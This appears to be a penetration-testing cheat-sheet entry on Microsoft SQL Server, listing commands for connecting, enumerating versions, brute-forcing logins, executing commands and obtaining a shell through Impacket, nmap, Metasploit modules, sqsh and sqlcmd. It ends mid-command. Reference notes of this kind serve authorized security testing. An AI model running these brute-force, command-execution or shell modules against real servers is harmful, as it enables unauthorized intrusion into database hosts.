• MSSQL Microsoft SQL

    Access­ing in Linux: impacket-mssqlclient Administrator:password@$target -windows-auth Default data­bas­es are: Enumeration Deter­mine version nmap -p 445 --script ms-sql-info $target Via metas­ploit auxiliary/scanner/mssql/mssql_ping Via Impack­et mssqlinstance.py $target Login brute force scanner/mssql/mssql_login When an account is known, enu­mer­ate for vulnerabilities auxiliary/admin/mssql/mssql_enum Exploitation Exe­cute commands auxiliary/admin/mssql/mssql_exec Get shell windows/mssql/mssql_payload Tools Com­mand line sqsh -U sa -P $password -S $target:1433 From Pow­er­Shell sqlcmd -S…